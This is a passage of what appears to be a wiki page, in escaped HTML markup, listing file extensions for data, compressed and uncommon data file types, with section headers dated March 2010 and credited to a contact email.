.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
